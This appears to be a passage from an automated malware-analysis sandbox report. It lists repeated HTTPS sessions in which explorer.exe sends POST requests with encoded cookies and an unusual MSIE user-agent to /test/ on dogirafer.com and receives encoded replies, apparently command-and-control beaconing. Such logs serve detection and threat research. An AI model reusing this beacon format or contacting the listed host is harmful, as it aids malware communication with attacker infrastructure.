                                                                                                                                                                              2024-12-03 16:46:34 UTC343INData Raw: 31 35 30 0d 0a 50 69 75 63 51 38 4b 37 32 34 70 67 59 78 6e 62 68 6d 58 69 67 33 52 48 4d 30 6a 55 42 55 36 6c 62 2f 75 7a 76 53 58 50 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 4a 6d 4a 45 34 6f 66 70 47 4f 67 56 34 6b 43 62 71 33 75 65 30 4d 74 35 4f 6e 70 73 45 37 67 69 4e 54 47 57 64 4e 35 6f 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 47 47 38 38 34 41 65 2f 72 54 68 34 52 5a 4c 50 47 65 48 42 68 35 6f 64 45 35 6c 62 56 43 58 5a 43 68 55 6b 2f 4e 6c 34 41 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 50 50 56 56 51 70
                                                                                                                                                                              Data Ascii: 150PiucQ8K724pgYxnbhmXig3RHM0jUBU6lb/uzvSXPKRib7xuPoA21j4bUizJmJE4ofpGOgV4kCbq3ue0Mt5OnpsE7giNTGWdN5o+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzGG884Ae/rTh4RZLPGeHBh5odE5lbVCXZChUk/Nl4AcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZPPVVQp
                                                                                                                                                                              2024-12-03 16:46:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              32192.168.2.450039104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:35 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:37 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:36 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rUzbUX%2FfBO%2FN0WAKXiw8xkjwBfOirWrPD2%2FEwyaNfedexP8iv3RNBJ%2Bs785OiK7Cr9gQSa6N7xcjzIW8hF35iNviDPV558t42Hs0ydFr7LCIL4GdChjInfsNfYHkHPYL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec508a17bc86a4e-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1764&rtt_var=676&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1600877&cwnd=202&unsent_bytes=0&cid=585e898979b7ec94&ts=1678&x=0"
                                                                                                                                                                              2024-12-03 16:46:37 UTC339INData Raw: 31 34 63 0d 0a 4d 79 6d 59 54 63 43 33 33 49 70 6e 61 78 6e 5a 67 32 66 6b 67 33 64 4d 50 45 2f 65 44 43 6a 43 62 66 71 33 75 79 62 4e 59 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 76 4a 6b 41 72 63 35 66 69 37 46 30 68 44 37 57 33 74 4b 4a 47 73 4a 47 6f 72 4d 30 34 35 55 35 51 47 57 4e 4b 36 34 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 4c 45 63 77 7a 41 4f 33 6b 54 68 6f 58 5a 4c 58 49 65 6a 30 71 34 6f 56 46 36 56 58 55 5a 78 31 42 69 30 6f 38 4e 78 63 31 42 4f 6e 69 50 50 6a 56 45 48 69 59 50 6e 61 70 56 6a 65 4a 49 6c 38 58 4e 79 76 34 33 77 39 32 57 66 38 54 69 73 7a 5a 68 61 56 66 4d 34 33 6e 77 63 72 6a 50 2f 42 52 54 70
                                                                                                                                                                              Data Ascii: 14cMymYTcC33IpnaxnZg2fkg3dMPE/eDCjCbfq3uybNY2mcphSGpB6yiJiVjA1vJkArc5fi7F0hD7W3tKJGsJGorM045U5QGWNK64+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzLEcwzAO3kThoXZLXIej0q4oVF6VXUZx1Bi0o8Nxc1BOniPPjVEHiYPnapVjeJIl8XNyv43w92Wf8TiszZhaVfM43nwcrjP/BRTp
                                                                                                                                                                              2024-12-03 16:46:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              33192.168.2.450040104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:38 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:40 UTC777INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:40 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YDoDe0a0K66mPAelkrK8ldopLRMluCGVZg4M7rXaTy6WD85BzdIeFKCSOnqmw67zl2Tsc5dU2T1PPFAk9zhWFURMPNEPglCwjSUazdamnp47zAKpPF0Ulmx1X1bMASk0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec508b57ab04282-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1579&rtt_var=599&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1817050&cwnd=252&unsent_bytes=0&cid=d1092ce85d3dd269&ts=1635&x=0"
                                                                                                                                                                              2024-12-03 16:46:40 UTC343INData Raw: 31 35 30 0d 0a 50 69 75 56 52 73 71 79 33 6f 70 67 5a 52 37 64 68 57 44 6d 67 33 46 49 4f 45 37 58 41 55 36 71 5a 2f 61 32 76 53 44 50 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 42 6d 4c 6b 38 75 65 70 75 4f 67 46 6f 6d 44 37 4b 39 73 75 30 4f 75 35 4b 6d 70 63 6b 37 67 69 5a 55 48 32 46 46 37 73 4c 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 47 73 6f 33 42 65 2f 72 54 68 6f 51 61 4c 50 46 66 48 52 68 34 59 4e 48 37 56 66 62 44 58 5a 41 67 55 41 2f 4e 46 67 4e 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 76 46 54 52 5a
                                                                                                                                                                              Data Ascii: 150PiuVRsqy3opgZR7dhWDmg3FIOE7XAU6qZ/a2vSDPKRib7xuPoA21j4bUizBmLk8uepuOgFomD7K9su0Ou5Kmpck7giZUH2FF7sLsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4Gso3Be/rThoQaLPFfHRh4YNH7VfbDXZAgUA/NFgNcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOvFTRZ
                                                                                                                                                                              2024-12-03 16:46:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              34192.168.2.450041104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:41 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:43 UTC783INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:43 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6h5S6gDNEfWzyp3nZ3R20AhoyU9dX7dp03%2FXfgSyS0bxDts4U2cDWPbcGqOrmPu9GS0VWhlyYD%2FVbgVe5EXapbuUc6BAm0DMdq5BBkQnGdviCx48G%2BuRTI9DXLwb7Say"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec508c9cf210f9d-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1517&min_rtt=1514&rtt_var=574&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1896103&cwnd=193&unsent_bytes=0&cid=59c6f91d0a804b99&ts=1601&x=0"
                                                                                                                                                                              2024-12-03 16:46:43 UTC343INData Raw: 31 35 30 0d 0a 4f 43 57 5a 51 4d 71 36 33 59 70 68 61 78 7a 66 68 57 2f 6e 67 33 35 4c 50 45 50 54 44 43 58 43 61 2f 69 78 76 53 58 50 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 49 55 63 76 65 35 76 6c 37 46 6f 72 43 62 75 37 74 36 52 47 74 35 4f 72 6f 4d 38 34 37 30 35 56 48 6d 74 4e 37 73 71 6b 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 6b 77 41 4f 4c 6b 49 52 70 2b 62 37 37 44 66 33 4d 6c 35 63 74 42 36 46 66 5a 43 52 68 47 37 45 45 30 4e 46 38 4c 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 76 52 61 52 5a
                                                                                                                                                                              Data Ascii: 150OCWZQMq63YphaxzfhW/ng35LPEPTDCXCa/ixvSXPYGmcphSGpB6yiJiVjA1nIUcve5vl7ForCbu7t6RGt5OroM84705VHmtN7sqkfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KckwAOLkIRp+b77Df3Ml5ctB6FfZCRhG7EE0NF8LcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZNvRaRZ
                                                                                                                                                                              2024-12-03 16:46:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              35192.168.2.450042104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:44 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:46 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:46 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cg%2FsplNSKJ%2B2hkGgHsaP3FIfiT0rQkiMmEa00ewNFOaxCLf1JNI1TdJcRBsfL%2FxCuOP%2BZyPnO9T9eByG7IseHK17OgLO1gMVHMnxBl4ekZchWGv8En0fVhoxj2MNw5tX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec508dc4df90fa1-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1473&rtt_var=569&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1894873&cwnd=252&unsent_bytes=0&cid=3edfb6797205d194&ts=1658&x=0"
                                                                                                                                                                              2024-12-03 16:46:46 UTC339INData Raw: 31 34 63 0d 0a 4f 53 69 63 54 63 47 32 32 6f 70 6a 59 68 33 65 68 47 62 6f 67 33 4e 4f 4d 6b 6e 65 44 43 44 43 62 50 69 33 75 69 37 4c 62 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 72 49 6b 38 75 63 70 4c 6a 37 46 73 67 44 4c 43 33 73 4b 46 47 73 4a 4b 6e 70 63 38 32 67 69 56 63 47 47 46 4b 37 73 76 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 38 6f 77 41 2b 72 69 49 58 4d 57 61 62 66 43 65 33 51 6f 71 34 56 43 37 31 62 63 44 58 5a 4f 68 55 38 35 4d 46 31 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 68 50 76 4a 56 52 4a
                                                                                                                                                                              Data Ascii: 14cOSicTcG22opjYh3ehGbog3NOMkneDCDCbPi3ui7LbWmcphSGpB6yiJiVjA1rIk8ucpLj7FsgDLC3sKFGsJKnpc82giVcGGFK7svsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4F8owA+riIXMWabfCe3Qoq4VC71bcDXZOhU85MF1EA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbhPvJVRJ
                                                                                                                                                                              2024-12-03 16:46:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              36192.168.2.450043104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:47 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:49 UTC787INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:49 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iTi9oXFPJKCohXlDgHtOA3UbS76TUJ2UugBxYicTiM%2B%2Bnf%2FZ0eyiXu%2BzJDYgcoQpkaot%2FQHFw0YHTG4R30Yu71qHLo2bEC6V7tsOK8LDRqpCGzCKObEG4aGJdZErrMBp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec508ef6ff4436d-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1706&rtt_var=698&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1505930&cwnd=159&unsent_bytes=0&cid=7b85bc71e4d92626&ts=1645&x=0"
                                                                                                                                                                              2024-12-03 16:46:49 UTC347INData Raw: 31 35 34 0d 0a 50 53 32 62 51 73 47 7a 30 49 70 75 61 78 6a 52 68 6d 54 67 67 33 46 4e 4f 55 7a 65 41 53 66 43 5a 76 2b 33 76 69 4c 4e 5a 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 49 6b 55 6f 65 70 44 6a 37 46 38 6c 43 72 65 32 73 61 46 47 74 4a 75 73 6f 73 30 36 37 6b 35 53 47 57 74 46 37 73 61 69 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 38 77 44 4f 76 6c 4b 42 35 2b 61 72 54 43 65 33 67 6f 37 38 74 48 37 56 4c 55 41 52 70 42 37 45 30 2b 4e 46 34 49 4f 6f 54 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 61 52 4a
                                                                                                                                                                              Data Ascii: 154PS2bQsGz0IpuaxjRhmTgg3FNOUzeASfCZv+3viLNZ2mcphSGpB6yiJiVjA1mIkUoepDj7F8lCre2saFGtJusos067k5SGWtF7saifW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc8wDOvlKB5+arTCe3go78tH7VLUARpB7E0+NF4IOoTMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1aRJ
                                                                                                                                                                              2024-12-03 16:46:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              37192.168.2.450044104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:50 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:52 UTC790INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:52 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uX%2BcW0fFz%2F9l5Gt6bJyT%2BNv5hnT%2BMD8Shze1vOqyafHwsd9v3bRDrsVvsY%2F3B6rwjEIVlV6WcKPwMQw7kvVb3vZeSmIC20z2%2FOEjL4eOBBgKN3eB0XBkcI%2FyIefWW1nz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec509027f18727b-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1824&rtt_var=912&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4202&recv_bytes=1048&delivery_rate=241882&cwnd=230&unsent_bytes=0&cid=0e8c132f85c5e77f&ts=1672&x=0"
                                                                                                                                                                              2024-12-03 16:46:52 UTC343INData Raw: 31 35 30 0d 0a 4f 79 6d 63 52 73 47 79 32 49 70 6b 5a 68 2f 62 6a 47 2f 6a 67 33 4a 48 50 6b 50 65 42 43 4c 43 61 50 2b 30 75 69 66 4e 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 46 73 4a 55 45 72 66 5a 65 4f 67 56 73 6b 43 62 43 32 74 4f 30 43 73 4a 4b 73 72 63 77 2f 67 69 52 51 48 57 42 4a 37 4d 76 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 73 38 32 41 2b 2f 6d 4a 58 4d 54 5a 62 50 45 65 6e 51 70 71 34 56 50 35 31 66 65 44 42 6f 70 69 30 73 2f 4e 6c 49 49 4e 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 4a 62 51 70
                                                                                                                                                                              Data Ascii: 150OymcRsGy2IpkZh/bjG/jg3JHPkPeBCLCaP+0uifNKRib7xuPoA21j4bUizFsJUErfZeOgVskCbC2tO0CsJKsrcw/giRQHWBJ7MvsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4Fs82A+/mJXMTZbPEenQpq4VP51feDBopi0s/NlIINsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfJbQp
                                                                                                                                                                              2024-12-03 16:46:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              38192.168.2.450045104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:54 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:55 UTC787INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:55 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwFS8dmAz6BV3JSke79r86TZ1qVfk%2FzQ3afdb6iorjZsBiThJ2oNuzhlDUALntli%2BMk2554Zr1MBNeXSB%2BBComgS2%2BHh4r%2BGxgodDBQLrEqsoAfv15CAP3ssyKJiobVa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec509155da332d3-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2161&min_rtt=1866&rtt_var=911&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1564844&cwnd=146&unsent_bytes=0&cid=784b2e385fbacf4c&ts=1620&x=0"
